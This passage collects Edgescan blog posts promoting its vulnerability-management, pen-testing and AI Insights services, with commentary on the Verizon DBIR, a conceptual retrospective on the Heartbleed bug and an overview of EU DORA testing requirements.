vulnerability management. As proud partners in this research, we are excited to apply these findings to real-world security challenges. We encourage all security professionals to read the full report to gain a deeper understanding of exploitation patterns and the performance of prediction models like EPSS. We can collectively work towards more effective, efficient, and risk-aware vulnerability management practices by leveraging this knowledge. Stay tuned for more updates on how we're integrating these insights into our services to provide you with cutting-edge vulnerability management solutions. ### AI Security Excerpt: Recently, there has been an explosion in the use of LLMs (Large Language Models) and Generative AI (Artificial intelligence) by organisations looking to improve their online customer experience. ### Enhancing Cyber Security with AI Insights by Edgescan Edgescan AI Insights is designed to provide guidance on questions such as:“What vulnerabilities should we focus on?”“What developer training would help improve our security posture?”“Which assets are potentially exposed to ransomware attack?” Live Fast Die YoungIn today's rapidly evolving digital landscape, organizations face an ever-increasing number of cyber threats. The challenge of maintaining a strong cyber security posture is more critical than ever, yet traditional methods often fall short in providing timely and actionable insights.There are many badges of “honor” (big oversized question mark), and endless war stories a lot of us have lived through, that tell us we are overrun; large expanses of data, too many vulnerabilities, lack of context, poor risk prioritization, and essentially not knowing what to fix first! And all on 4 hours of sleep.SOC burnout is increasingly on the rise, which is not the healthiest topic of conversation when looking at an entry point into a “rewarding career” in any given industry.It is abundantly evident that security analysts across the Enterprise and MSS/MSP space need more direct help and less “faff and waffle” when it comes to making decisions and taking next steps in reducing cyber risk in their respective working environments. Help Has Arrived: AI Insights by EdgescanAI Insights by Edgescan addresses these problems by leveraging advanced AI technology to provide real-time cyber security insights, empowering organizations to make informed decisions and enhance their security measures. By analyzing vulnerability data with the AI-Powered Insights engine, AI Insights delivers personalized, tactical, and strategic recommendations to mitigate risks, prioritize remediation efforts, and maintain compliance. Key Features of AI InsightsAI-Powered Cyber Security InsightsAI Insights utilizes Edgescan's AI-Powered Insights engine to provide real-time analysis of vulnerability data. This powerful tool offers:Real-Time Analysis: Instantly analyzes vulnerability data to provide immediate insights.Personalized Insights: Delivers tailored insights based on your organization's specific vulnerability data.Ransomware Risk AssessmentTo combat the ever-present threat of ransomware, AI Insights includes:Vulnerability Indicators: Evaluates discovered vulnerabilities to assess ransomware risk.Exposure Focus: Identifies which exposures should be prioritized to minimize breach risks.Remediation PrioritizationAI Insights helps organizations address the most critical issues first with:Threat-Based Prioritization: Uses real-world threat analysis, ransomware intelligence, and threat metadata to determine which issues to address first.Compliance GuidanceMaintaining compliance with various security frameworks is simplified with AI Insights:Framework Compliance: Provides guidance to ensure compliance with frameworks such as CIS, PCI-DSS, DORA, HIPAA, ISO, SOC2, GDPR, and more.Training FocusAI Insights helps improve organizational skills and reduce vulnerabilities by:Educational Recommendations: Suggests where to allocate developer and technical education budgets based on trends in vulnerabilities, their rate of occurrence, and associated risks.Exploitable VulnerabilitiesAI Insights offers crucial information on vulnerabilities and exploit codes:Exploit Code Insight: Provides information on current open vulnerabilities and associated exploit codes to aid in prioritization decisions.Anomaly DetectionAI Insights enhances security monitoring by detecting unusual patterns:Estate-Wide Trends: Identifies significant weak spots, vulnerability clustering, exposure frequency, and business unit security posture.Cyber Trends: Highlights anomalies and trends that deviate from the norm across your security landscape.Dynamic and Scalable InsightsAI Insights adapts to your organization's needs with:Large Dataset Analysis: Analyzes a vast landscape of over 15,000,000 verified vulnerabilities to generate actionable insights and trending information.Organizational and Unit-Level Insights: Provides insights specific to a single organization or shared across multiple organizations and business units.Adaptive Insights: Continuously updates as your business and security posture evolve.Rapid Response: Links report data to live vulnerabilities for quick action.Benefits of AI InsightsImplementing AI Insights by Edgescan offers numerous advantages, including:Enhanced Security Posture: Gain real-time, personalized insights and prioritize remediation efforts effectively.Risk Mitigation: Focus on reducing risks associated with ransomware and other cyber threats.Compliance Catch Up: Maintain and streamline compliance with critical security frameworks.Improved Training: Guide investment in education to reduce vulnerability recurrence and improve overall security expertise.Informed Decision-Making: Access detailed, actionable insights to make data-driven security decisions.Proactive Threat Management: Detect and address anomalies and trends that could signify emerging threats. ConclusionAI Insights by Edgescan is a dynamic and robust solution for organizations aiming to enhance their cyber security through intelligent, real-time analysis and actionable insights. It empowers security teams with the tools needed to prioritize vulnerabilities, comply with regulatory standards, and invest wisely in security training and resources. For the modern CISO, AI Insights is an essential tool to stay ahead of cyber threats and maintain a strong security posture.Figure 1. AI Insights dashboard. ### Edgescan: Simplified Security for Small Teams In my role at Edgescan, I often come across teams with 1 to 5 InfoSec professionals. These teams typically include a mix of security-minded, development-focused, and administrative roles, with a leader spearheading their efforts. While each team and organization is different, one factor remains the same across each program: Everyone is trying to do as much as they can with the people and budget that they are allocated. With that in mind, I’ve listed the five most common ways that Edgescan impacts these teams that feel the pain of tight budgets and resource scarcity.5 Ways Edgescan Helps Small Security Teams Succeed1 Getting Onboard: No Tool Configuration or Maintenance RequiredWith Edgescan, the work of configuring and maintaining scanners isn’t put on you and your team. Simply tell us what you need tested, and we'll handle the setup. Our asset blocker workflow even alerts you to issues (such as DNS resolution) preventing thorough scanning. If we’re scanning on your internal or private network, we’ll build a virtual machine for you, all you need to do is deploy it.2 Getting Real Vulnerability Data: Hybrid Vulnerability TriageI think we’re all in agreement that no one likes false-positives and false-negatives. Our hybrid approach to validation uses AI, analytics, and human expertise to validate vulnerabilities efficiently. We auto-validate low-hanging fruit and have pen testers manually review high/critical vulns to weed out false positives and negatives. For your team, this means you can spend more time making critical remediations and less time working through the noise that scanners produce.3 Context and Narrative: Simplifying Prioritization with Key Metrics and FactorsEdgescan provides 5 ; levers for prioritization, including EVSS (Edgescan Validated Security Score), CVSS, EPSS (Exploit Prediction Scoring System, by FirstOrg) , CISA KEV and EXF (Edgescan Exposure Factor, aggregated risk score to ensure that each remediation has a tangible impact on overall risk across all regulatory bodies). We provide all of these levers to help you prioritize remediations. Beyond scoring systems, each vulnerability that Edgescan presents provides detail around the impact of the vulnerability, should a hacker utilize this attack path. This is all part of an effort to help you easily determine which fixes will have the greatest impact for your organization and eliminate risk across any applicable framework.4 Simplifying Fixes: Step-by-Step Remediation GuidanceFor each vulnerability, Edgescan spells out any and all methods to remediate or patch the vulnerability identified. If there’s a simple fix, such as “update to version X,” we’ll include the links so your team doesn’t have to scour the web. We’ll also provide any associated CVEs, CWEs, and/or CIS Control Violations. No more guessing how to fix issues or wondering if you've closed gaps. We give you a clear roadmap.5 Help From Experts: Expert-Led Support for EverybodyIf you ever have a question or just want some advice, every Edgescan client, regardless of package, has access to our in-house team of Crest and OSCP certified pen testers. Each and every one of our clients, regardless of size or spend, get the answers and expertise necessary to understand the impact of vulnerabilities and remediations made.In Conclusion: Do More With the Resources You HaveWe understand, more than most, the time and effort that tools create. We also understand how hard it is to get a pentest done and then hope that your remediations take effect before the next assessment. Nobody likes being surprised come audit time! Edgescan was created by pen testers to solve the problems they experienced when they were in the thick of it, just like you and your teams – we take care of all of the work leading up to remediation, so you can do more with less. Get more for your security with your existing budget, by partnering with Edgescan.Contact us to learn more about simplifying security for your team. ### Change for the Sake of Change: Dealing with Dynamic AWS Hosts "The only constant is change itself."  Who would have thought words from two and a half millennia ago could ring so true in the world of cyber security and cloud computing in 2024?Well, here we are, creating and inventing at an astronomical pace, and making sure we do so securely.  I'm afraid not.  A few of us thought "secure by design" was going to lead us to a new job, and move to another industry, but alas, we are busier than ever, and it is not relenting. Change is All AroundThe pace and, more importantly, "frequency" of change are now the new normal. Whether it is daily or hourly code pushes, virtual image refreshes, patching updates, or dynamic cloud asset refreshes, we are living with systems that are constantly moving and changing.As both of these parameters increase across cloud environments, our need for the aforementioned creating and inventing becomes greater and greater. Yet our need for continuous visibility and monitoring and "proactive everything” has never been more necessary. Threats and vulnerabilities, or "exposures," are out of control, and there is a never-ending production line of bad actors scooping up the free chips.We were always told, “It is recommended you conduct a pen test following any significant change to your infrastructure.” So that’s daily, then!In 2022, we were reliably informed by mega analysts Gartner that threat and vulnerability management programs are no longer working, they are failing drastically (I suppose the numbers of unfixed vulnerabilities lying around speak for themselves), and that they are no longer enough. We must “broaden the net” by implementing a CTEM approach, and take in greater scope and discovery, and then consequently "narrow the net" through prioritization and validation, before finally mobilizing the troops. All of which sounds very much like what we have been doing here at Edgescan for a while now.  But anyway... more change. The Dynamic CloudWith the continued adoption of more and more cloud services, the Edgescan team has been busy, beavering away to make AWS users’ lives a little easier. They are solving a significant problem that can be quite a pain, particularly when the audit and compliance police are knocking on your door looking for asset inventory reports and historical vulnerability reports from said dynamic cloud assets.Many enterprises are benefitting wholesomely from the dynamic nature of cloud environments. While they are rightly utilizing best practices to manage and optimize their cloud assets, this does not always present as an ideal state for a third-party vendor or security partner to offer real value and insight from their solutions. The default status for security partners was as if they were looking from the outside in, preventing their ability to deliver the exact services and value they claim to provide.Part of the Edgescan Platform today provides customers with the ability to see and monitor their external attack surface through an integrated ASM product. This gives the requisite “visibility and monitoring of change” on the external or perimeter of the enterprise, with API Discovery, Host Discovery, Domain Investigation, and custom alerting. This integrates beautifully with our validated vulnerability management offering across both the host layer and layer 7, for the kind of coverage those Gartner folks were speaking about three paragraphs ago.When you move from external to internal or “private” IP space in the cloud, things tend to get a little trickier. This is why we have created the ability to tag AWS internal host infrastructure within the Edgescan Platform. AWS Internal Host Infrastructure TaggingAWS cloud tagging is an effective way to manage your cloud resources and gain best-practice insight into cloud operations and security. Due to the dynamic nature of cloud infrastructure, many AWS users rely on tags to identify their EC2 instances. Edgescan leverages this technology to utilize these tags instead of IP addresses as scan targets, enabling us to not only track vulnerabilities across multiple scans, but also provide a more descriptive approach for our user base.What is This? Edgescan AWS tagging for internal AWS host infrastructure.How does it work? We use a custom DNS server that automatically updates DNS records based on the tags on your EC2 instances in order to allow scanners to target them.Who can use it? Any Edgescan customer who uses AWS internal host infrastructure.What Problem does it solve? Dynamic cloud IP addresses are impossible to track using manual means. Continuity of historical data and consistent reporting from these cloud assets has always been a problem. Edgescan AWS tagging now resolves the problem of tracking and reporting on dynamic or ephemeral IP addresses in the AWS cloud. Closing RemarksIn closing, it still looks like we are not that good at dealing with all this change, from a systematic cyber security perspective. We are undoubtedly coming up with solutions after the problems have been created. Will this ever change? Probably not. Do we want it to change? Probably not. ### Beyond Scanners: How In-Depth Pen tests Strengthen Cyber Defenses In today's threat-filled digital landscape, organizations face relentless assaults from hackers seeking to exploit any weakness to breach networks, steal data, disrupt operations and more. One of the most effective ways to harden cyber defenses is to identify and address vulnerabilities before criminals can exploit them. This is where penetration testing comes into play.As a crucial piece of any vulnerability management program, penetration testing, or "pen testing", is the practice of simulating real-world cyberattacks to evaluate the security of an organization's systems and networks. It involves authorized security professionals (ethical hackers) using the same tools and techniques that malicious attackers employ to breach defenses and gain unauthorized access. The clear difference being that pen testing is done with the permission of a given organization in a controlled manner to help an organization rather than harm it.The main objective of a pen test is to uncover as many security weaknesses as possible so they can be remediated before the real threat (external attackers) can exploit them. This includes identifying vulnerabilities such as software flaws, misconfigurations, weak passwords, and logic errors. By thoroughly assessing systems with an adversarial mindset, expert pen-testers provide an in-depth evaluation of an organization's attack surface and the effectiveness of their security measures in place. With this in mind, pen testing alone cannot allow organizations to stay in-the-know year-day in and day out. Automated vulnerability scanning tools can be utilized to identify known security flaws quickly and consistently, but they cannot replace the need for manual testing performed by skilled human experts.While scanning has its place in the vulnerability management program, it only scratches the surface. It may not detect more subtle issues that can exist in custom applications or unique system architectures. Scanners can only identify documented vulnerabilities and cannot detect complex multi-step attack vectors or business logic flaws. These types of vulnerabilities require creative, out-of-the-box thinking. It is crucial to have both automated scanning tools and manual testing, performed by experts, to ensure proper security measures are in place.Hands-on-keyboard assessments performed by experienced pen testers are absolutely vital in the efforts to harden defenses. Skilled testers go beyond just running tools - they probe systems inquisitively, using their deep knowledge of attack techniques and experience with myriad technologies. They experiment, adapt, and follow hunches to uncover hidden weaknesses that a scanner would never see.As an example, imagine pen testing a large custom-built web application. In this scenario a scanner might check for an SQL injection on login fields or look for known vulnerable Javascript libraries. But a human tester will explore every input field, test for access control issues, analyze the logic to find ways to bypass workflows, manipulate APIs unexpectedly, and chain multiple small bugs together - relentlessly hunting for any crack in the armor.Another key benefit of manual pen testing is the ability to provide in-depth context around findings. A scanner reports a vulnerability, but a skilled tester can demonstrate how it could be exploited, gauge the potential impact, and provide remediation advice tailored to the specific organization and its technology stack. This extra insight helps companies effectively prioritize their efforts, based on real-tangible risk.Real-world critical vulnerability data from Edgescan's 2024 Vulnerability Statistics report highlights the importance of thorough manual testing:CVE-2023-28252, a Windows CLFS Driver vulnerability allowing privilege escalation, was exploited to distribute Nokoyawa Ransomware. The root cause was weak authorization logic in the application due to poor development practices and insufficient QA. This type of flaw is difficult to detect with automated testing tools alone.Malicious file upload vulnerabilities accounted for 7.25% of all high and critical severity issues found by Edgescan in 2023. While often overlooked, these flaws can enable attackers to deliver ransomware and malware or establish footholds for further compromise. Detecting malicious file upload issues is straightforward for skilled manual testers but can be missed by automated scans.Of course, manual pen testing takes more time, effort and budget than automated scanning. Expertise is required, and the scope of each and every assessment must be carefully outlined. But the fact remains, in-depth expert -led assessments are a necessary investment for organizations serious about security.Pen testing frequency depends on factors like organization size, compliance mandates, and risk tolerance, but an annual assessment is regarded as a mandatory exercise by regulators, underwriters, and practitioners alike.Even still, we all understand that no defense is impenetrable and new threats constantly emerge. With this in mind, pen testing alone cannot allow organizations to stay in-the-know year-after-year, day in and day out. Automated vulnerability scanning tools can be utilized to identify known security flaws quickly and consistently, but they cannot replace the need for manual testing performed by skilled human experts.A proactive, well-informed defense is crucial in a world where cybercrime is ever-present. Hands-on penetration testing is one of the most powerful tools available to bolster an organization's resilience in the face of determined adversaries. By viewing systems through the eyes of an attacker and identifying and closing gaps before criminals exploit them, companies can reduce cyber risk, protect valuable assets, and operate with greater confidence in a dangerous digital world.How Edgescan Approaches Pen TestingAt Edgescan, we strongly believe in the significance of human expertise in pen testing. This is why our pen testers are highly experienced security professionals, not junior analysts or anonymous crowd-sourced researchers. Our testers hold top certifications such as the OSCP and CREST, and they have been with the company for an average of 7 years. We heavily invest in continuous training to ensure their skills remain up-to-date and sharp.When you get a pen test from Edgescan, you can be confident it's a thorough, "hands-on-keyboard" assessment conducted by seasoned experts who look deeply for flaws, not just a dressed-up automated scan. We back this up with rigorous operational practices - as an ISO 27001 certified company, you can trust us to handle your data and access your systems responsibly.Our pen test services integrate seamlessly with Edgescan's acclaimed vulnerability management platform. This enables customers to get periodic in-depth pen testing and maintain continuous visibility of their security posture via automated scanning, insightful dashboards, and reports. It's a holistic solution for proactive cyber defence.Don't settle for a "pen test" that's little more than a fancy scan from a vendor who can't actually deliver human expertise. And don't rely on occasional check-the-box assessments that leave you exposed in between. Partner with Edgescan for real, comprehensive pen testing conducted by top experts, integrated with powerful scanning and risk management capabilities. ### Continuous Threat Exposure Management (CTEM): What is it? Is Edgescan CTEM? When you look at Edgescan as a platform, we’ve been delivering CTEM for many, many years—before Gartner coined the phrase in 2022.What is CTEM/TEM?Deliver Scope for Cybersecurity Exposure: Investigate an organization’s “Attack Surface”—vulnerable entry points and exposures—and discover assets.Improve Security Posture: By continuously monitoring, assessing, prioritizing, and resolving security issues, CTEM helps organizations improve their security posture and efficiently use an organization’s resources.Prioritize Threats: The goal of any robust TEM process is not to fix every single security issue discovered. Everyone has a vulnerability backlog, and we need to fix what has a decent probability of a breach.Validate how a successful exploit might work: Confirm/Validate whether an attacker could actually exploit a vulnerability and what the impact might be. Provide a working example that explains the issue to non-cyber team members and executives.The above is not rocket science, and I question if this actually deems an acronym TBH...  :) Edgescan’s Evolution (CTEM before CTEM was a “thing”)Vulnerability Detection:We started with RBVM (Risk Based Vulnerability Management) in 2016, which consisted of automated DAST and device security scanning combined with cyber analytics and expert human validation for high and critical severity vulnerabilities. We have tested hundreds of thousands of assets to date with this SaaS, delivering validated vulnerability data, saving our clients time and money.In 2020, we started using our Data Lake of 15,000,000 vulnerability data signatures. Given it was all validated manually, the accuracy lent well to an analytics model, which is used to verify the probability a discovered vulnerability is real – An additional level of validation to help ensure accuracy.In 2021, we deployed a Single-Page Application (SPA) scanning feature to parse JavaScript and dynamic HRefs, which many scanners miss. We also deployed API scanning technology, which consumes API descriptors to cover the API endpoints' attack surface properly.In 2022, we deployed dynamic mapping to CISA KEV and EPSS to provide additional ways to prioritize vulnerabilities. In 2023, we delivered EXF (Edgescan eXposure Factor), combining traditional severity ratings like OWASP and CVSS with EPSS and CISA KEV to provide even more actionable insight into what to prioritize.Attack Surface Management:2017: We deployed “Continuous Asset Profiling,” Now called ASM (Attack Surface Management), coined by Gartner in 2021. This evolved from continuous profiling of named IP ranges for exposures, services, and ports to EASM (External ASM), which crawls the internet, discovers IPs, API’s subdomains, certificate health, defensive HTTP headers, and brute forcing to name a few features…more here: https://edgescanstage.wpengine.com/asm-done-right/Penetration Testing (as a Service): PTaaSIn 2018, we deployed “Edgescan Advanced” to provide depth of testing. It was designed to discover vulnerabilities that automation has difficulty with by combining both automation and human expertise. We currently have one of Europe's largest penetration testing teams, delivering this service at a massive scale. The mantra was “Automate the shite out of everything as long as accuracy and coverage do not suffer”. This has worked, and Edgescan delivers (as of last month, April 2024) 160+ penetration tests every month via the platform. Testing is CREST Pentest compliant using a team of OSCP, CEH experts. We deliver this globally, combined with the above ASM and RBVM on-demand via the Edgescan platform.Situational Awareness & Integrations:Alerting, Events & SOAR (Security Orchestration, Automation and Response) is a solution stack of compatible software programs that allow an organization to collect data about security threats from multiple sources and respond to low-level security events without human involvement and in real-time.Edgescan enables SOAR in many ways:Vulnerability Discovery/Closure/Event AlertingEASM/ASM Asset Event AlertingAPI DiscoveryInternal mitigation SLA alerts (vulnerability age alerts).And much more: https://edgescanstage.wpengine.com/integrations/Once a vulnerability is discovered, it undergoes validation and risk rating to help ensure it is accurate and detailed enough to guide DevSecOps/Admin staff to mitigate the risk. "Edgescan Events" provide alerting to named members of staff or dedicated channels.Artificial Intelligence:We can’t talk about our Black Ops’ development team and what they are working on. But be assured, its very, very cool and will provide real value to our clients (as opposed to us).ConclusionSo regarding CTEM/TEM, yes, Edgescan is and has been a CTEM solution (with ASM) even before analysts coined the phrase. I thought it was best to point this out in a “room full of many loud voices.” ### Edgescan and the Verizon DBiR It is that time of the year again when Verizon Business release its world-renowned Data Breach Incidence Report (DBiR).As per previous years, it discussed the avenues for breach and has some commentary on trends within the industry.For the fourth year in a row, Edgescan was invited to submit data to the research, and we did. We shared thousands of validated vulnerabilities based on the previous 12 months of delivering Penetration Testing as a Service and Risk-Based Vulnerability Management assessments to over 250 organizations globally across multiple verticals.Looking at the 2024 report some key points resonate:25-year-old vulnerabilities are still a serious problemThe report cited a substantial growth of attacks involving the exploitation of vulnerabilities as the critical path to initiate a breach compared to previous years. They increased by 180% from last year due to widespread vulnerabilities such as MOVEit and similar zero-day vulnerabilities.The MOVEit vulnerability (CVE-2023-34362) affected at least 122 organizations and exposed the data of roughly 15 million people. It was, in effect, a SQL injection attack. It's worth remembering that SQL Injection (SLQI) was discovered in 1998. So, we are still dealing with 25-year-old vulnerabilities, which does not bode well for the cybersecurity and development industry.SQLI was also the most common critical severity vulnerability discovered by Edgescan, per the 2024 Edgescan Vulnerability Statistics Report.Fig. 1One must consider with all the new approaches to application & cloud security: CTEM, BAS, ETM, CRQ, ASPM, CCA, IAST, TBPT, CAASM, CWAP etc, not forgetting AI based coding and assessment solutions, the dial has not moved very much. I believe the industry is moving “ahead” while ignoring the problem.Once breached, such attacks were primarily leveraged by Ransomware and other Extortion-related threat actors. As one might imagine, Web applications were the main vector for those initial entry points.So we need to think about two things here:Web applications (and software in general) weakness is the avenue for attack for Ransomware and extortion actors. Ensuring systems are secure makes this job harder for the attacker. A SQLI injection can not only be used to “dump” databases but also be used as a foothold for a Ransomware attack.The initial vector may well be phishing, credential stealing, or credential-based attacks, but once in, pivoting is made much easier via unpatched CVE’s and software vulnerabilities.Artificial General Intelligence (AGI) threat landscape is nonexistentTo paraphrase the report:The folks in Verizon concluded that “after performing text analysis of criminal forums data contributors, we could obviously see the interest in GenAI (as in any other forum, really), but the number of mentions of GenAI terms alongside traditional attack types and vectors such as “phishing,” “malware,” “vulnerability” and “ransomware” were extremely low, circa 100 cumulative mentions over the past two years.” - One would assume that cybercriminals are ahead of the curve in terms of techniques and approached to exploit & breach. Obviously, we are not there yet regarding the threat of “Evil AI”, but I’m sure the day will come.The top “Action Vectors” in breaches are Web ApplicationsThe report cites stolen credentials as a significant avenue of attack. Given that credentials are used with web applications, they go hand in hand with the use of stolen credentials and the exploitation of vulnerabilities to infiltrate defences.MTTR – Fixing code and PatchingThe report discusses “survival analysis of CISA KEV vulnerabilities.” It refers to CISA and claims to have found that it takes around 55 days to remediate 50% of critical vulnerabilities once their patches are available. Patching and mitigation generally do not occur in force until after the 30-day mark, and 12 months later, around 8% of CISA KEV vulnerabilities are still open.At Edgescan, we find delivering both CISA KEV and EPSS metadata is important in terms of prioritization. In my opinion, the days of CVSS-based priority are numbered. In summary, the DBiR states “if its in the KEV fix ASAP.”Web applications a favorite for RansomwareIn terms of “ways-in,” web applications are second to “direct Install” attacks, which leverage existing backdoors. This is followed by email attacks. Ransomware accounts for a large 11% of all incidents across 92% of industry verticals, which gives rise to the value of web application security. The DBiR team predicts that we will continue to see zero-day vulnerabilities being widely leveraged by ransomware groups into the future. Think MOVEit or Log4Shell.Basic web application attacks“Threat actors continue to take advantage of assets with default, simplistic and easily guessable credentials via brute forcing them, buying them or reusing them from previous breaches.” When discussing an assessment, it is recommended that the scope of testing include such techniques. 100% of attacks against web applications were from an external source. User credentials were the most common “trophy” from a Web Application attack. 13% of breaches involved exploiting a vulnerability in a web application. “The Financial and Insurance (18%); Information (14%); and Professional, Scientific and Technical Services (13%) industries make up the top three verticals affected by Basic Web Application Attacks.”Conclusion:Poor authentication mechanisms and weak passwords are very common vectors of a successful breach. Consider a strong password policy and multifactor authentication controls.Web application security is an underrated asset when it comes to defense against Ransomware.CISA KEV is a key indicator of what needs to be fixed ASAP. Old vulnerabilities still produce the most “bang for the buck.”AGI (Artificial General Intelligence) is not a clear and present danger yet!! But its day will come. Focus on the basics. ### Heartbleed: 10 Years of Heartache Ten years ago, the Heartbleed vulnerability (CVE-2014-0160) was publicly disclosed, revealing a critical flaw in OpenSSL versions 1.0.1 to 1.0.1f, a widely used cryptography library. OpenSSL is used as the basis for TLS in many Linux-based operating systems such as Ubuntu, Fedora, CentOS, OpenSUSE, and more. Open source web servers like Apache and nginx, email servers, chat servers and VPNs all used OpenSSL as well (The Heartbleed Bug).What did Heartbleed affect?The Heartbleed vulnerability affects two legs of the CIA triad, namely confidentiality and integrity. At the time of its disclosure, about 17% of the Internet's secure web servers were believed to be vulnerable to Heartbleed. More servers than this used OpenSSL, some were just using versions older versions of Open SSL that were not vulnerable. Windows servers use Schannel SSP instead of OpenSSL for their TLS/DTLS. However, just because you were running Windows servers did not mean that you got to breathe a sigh of relief. Load balancers, proxies, WAFs, VPNs, firewalls, etc. in many networks were also using OpenSSL.Heartbeat ExtensionHeartbleed allows attackers to extract sensitive data from memory, posing significant risks to millions of websites and their users. In the case of Heartbleed, the TLS/DTLS encryption itself didn’t fail. The “heart” in Heartbleed refers to the heartbeat extension (RFC6520), which would periodically send heartbeat messages between a client and a server to maintain a session. The Heartbeat Extension is where the Heartbleed vulnerability was discovered.Heartbeats are messages sent to a web server, which resets a session timer and causes the server to respond to the client an identical message. In-between heartbeats, the server lives in-memory, which gets overwritten after every heartbeat. A Heartbeat message can be any length up to 64 kb. The first part of a heartbeat message shows how large the message is. The second part is the message itself.How It Works“HeartBleed resulted from a missing bounds check before a memcpy() call that used non-sanitized user input as the length parameter in the Heartbeat extension implemented in OpenSSL.” (OWASP) In plain English, the Heartbleed vulnerability takes advantage of a missing bounds check that allows attackers to specify the length of a heartbeat message, without the Heartbeat extension checking how large the message is. The server allocates 64 KB of memory based on the expected size of the heartbeat, but the message is much smaller. The server repeats back the message and then leaks whatever the previous program left behind in-memory to fill up the rest of the 64 KB. While 64 KB of data is not a lot, these attacks could essentially be launched continuously and with no way of being detected, making it extremely dangerous in the wrong hands. The memory dumps could include program code, credentials, PII or just noise. Since Heartbleed affects an encryption protocol, a lot of the information dumped were primary key material.Mini Case StudyAn Edgescan client was convinced that Heartbleed would not affect them, because they used Windows servers across their organization. Edgescan leveraged a firewall using OpenSSL 1.0.1 that sat in front of one of their Microsoft Servers to exploit Heartbleed. After memory dumping the client’s mail server, we found a vacation request form that the skeptic submitted earlier that day. After we asked our skeptical stakeholder about his vacation request that he submitted at 10:47 AM that morning, he understood the severity of HeartBleed immediately.Technical Fixes and Long-Term SolutionsThe remedy involved updating OpenSSL to version 1.0.1g, which fixed the vulnerability, or recompiling OpenSSL with specific options to remove the vulnerable code. Heartbleed is untraceable and, in many cases, Heartbleed memory dumps contained primary and secondary key materials. Organizations had to perform remediation under the assumption that primary and secondary key materials had been dumped, because there was no way to tell whether this was the case. That meant revoking certificates and contacting your Certificate Authority (CA) to reissue certificates, resetting login credentials, among other steps.Impact and ResponseOnce news about HeartBleed spread, affected websites were urged to update their software and renew their security certificates. Subsequent analyses showed that many websites were slow to respond, with some servers remaining vulnerable for years after the patch was released. While this may seem hard to believe, currently 55% of vulnerabilities with a CVSS Score greater than seven are between 1 and 4 years old (Edgescan 2024 Stats Report). There are also around 34,000 devices in the United States that are still vulnerable to Heartbleed (Understanding SSL by Country)ConclusionHeartbleed highlights the continued importance of supporting open-source infrastructure initiatives. OpenSSL remains one of the most widely used open-source cryptography libraries and highlights the necessity of upkeeping open-source tools and libraries, namely because they are so widely used that a single vulnerability affects a mindboggling myriad of different software being deployed in the wild. Heartbleed led to the Core Infrastructure Initiative, which aimed to fund and support essential open-source projects to prevent similar vulnerabilities in popular open-source projects.Popular open-source libraries such as OpenSSL continue to experience particularly devastating zero-day vulnerabilities, another standout example is Log4J. OpenSSL was severely underfunded and running off about $2,000 in donations a year and only one full-time employee. (Tech giants, chastened by Heartbleed, finally agree to fund OpenSSL) Ten years later the lasting effects and lessons remain relevant. It’s important that we continue to invest in open-source projects that ensure the security and resilience of the Internet infrastructure.CitationsThe Heartbleed Bug: https://heartbleed.com/Edgescan 2024 Stats Report: https://edgescanstage.wpengine.com/intel-hub/stats-report/OWASP:  https://owasp.org/www-community/vulnerabilities/Heartbleed_BugTech giants, chastened by Heartbleed, finally agree to fund OpenSSL:  https://arstechnica.com/information-technology/2014/04/tech-giants-chastened-by-heartbleed-finally-agree-to-fund-openssl/Understanding SSL by Country: https://help.shodan.io/data-analysis/ssl-analysis-by-country ### Get Prepared for Digital Operational Resilience Act (DORA) Introduction to DORAThe Digital Operational Resilience Act (DORA) was brought in across European Union nations to address risk management gaps and attempt to harmonise these requirements across the EU. The act specifically targets financial service entities, i.e. largely those regulated by central banks, and introduces rules around incident management & reporting, digital testing and management of third-party risk. What is DORA?The European Council adopted DORA in November 2022 and will be in full force from 17th January 2025. DORA is an EU regulation that comprehensively addresses Information and Communication Technology (ICT) risk management in the financial sector by ensuring that all providers follow a set of standards to mitigate ICT risks for their operations. Prior to DORA, each EU country had different regulations for ICT risk. DORA aims to create a unified framework for all member states. Who Does DORA Apply to?DORA applies to financial entities and ICT third parties providing services to financial institutions, such as cloud platforms or data analytics – DORA does not only apply to traditional banks.Affected entities include traditional financial institutions, credit and payment institutions, investment firms & funds, crypto-asset providers, data reporting service providers, insurance companies and ancillary service providers, pensions providers, auditors and some ICT third-party service providers.Key Elements of DORAThere are five crucial elements of DORA which can be broken into the below:ICT Risk ManagementICT-related Incident Management, Classification, and Reporting Digital Operational Resilience Testing Managing of ICT Third-party Risk Information Sharing Arrangements DORA Testing RequirementsDigital Operation Resilience TestingPart of the ICT risk management framework DORA requires that financial entities define, document, and maintain a thorough and comprehensive digital operational resilience testing programme. Financial entities will need to ensure that appropriate tests are conducted on all ICT systems and applications supporting critical or important functions on at least a yearly basis. Some of the tests detailed in the DORA regulation include:Vulnerability assessments and scansOpen-source analysesNetwork security assessments gap analysesPhysical security reviewsQuestionnaires and scanning software solutionsSource code reviews where feasibleScenario-based testsCompatibility testingPerformance testingEnd-to-end testing or penetration testing.Threat-Led Penetration Testing (see below)  What Organisations will need to do to meet DORA Requirements:Demonstrate that they are conducting an appropriate set of security testing on ‘critical’ systems and applications at least annuallyFully address’ any vulnerabilities identified by this testingFor designated significant entities (as yet to be specified by a Regulatory Technical Standard (RTS) to conduct a Threat-Led Penetration Test (TLPT) at least once every three years. What is Threat-Led Penetration Testing (TLPT)?In addition to the above types of testing, certain financial entities will be required to carry out Threat-led Penetration Testing (TLPT) at least once every three years. TLPT is essentially red teaming based on threat intelligence and should cover at least the critical functions and services of a financial entity.Threat intelligence refers to information such as tactics, techniques, and procedures (TTPs) employed by cybercriminals that helps an organization understand the cyber threats it faces. Red teaming is a cybersecurity practice where a team of ethical hackers simulates real-world cyber-attacks to evaluate an organization's security posture and identify vulnerabilities. Red Teaming is different to a penetration test, in that it is usually focused on a specific goal or objective.For the lifecycle of a TLPT, the scope shall be determined by the financial entity itself, which is validated by the relevant competent authorities (EBA, ESMA, and EIOPA). Testing must be performed by a suitable testing organisation and it must be performed in a live production environment.The methodology around conducting the TLPT will likely be based on the ECB’s existing TIBER-EU framework. What is TIBER-EU?TIBER-EU is a European framework for conducting threat intelligence-based red-teaming tests, which was introduced in 2018. It outlines the TTPs that should be employed during testing, based on bespoke threat intelligence.TIBER-EU brings together a number of entities within organisations themselves and outlines third-party providers that are required to carry out the red-team capability and the threat intelligence capability. These providers work together with the organisation to conduct testing.The testing requirements mandated by TIBER-EU are clear, but it is unclear how they fit in with DORA. What are the next significant milestones for DORA?The European Supervisory Agencies (ESAs), along with other European authorities, are leading the development of the technical standards as required by the DORA Regulation. Further clarification on standards is expected to be published for public consultation in late Q3 2023 or early Q4 2023.4The timelines for further clarification on exact requirements in relation to performing resilience testing is to be expected by late Q4 2023. An Annual Penetration 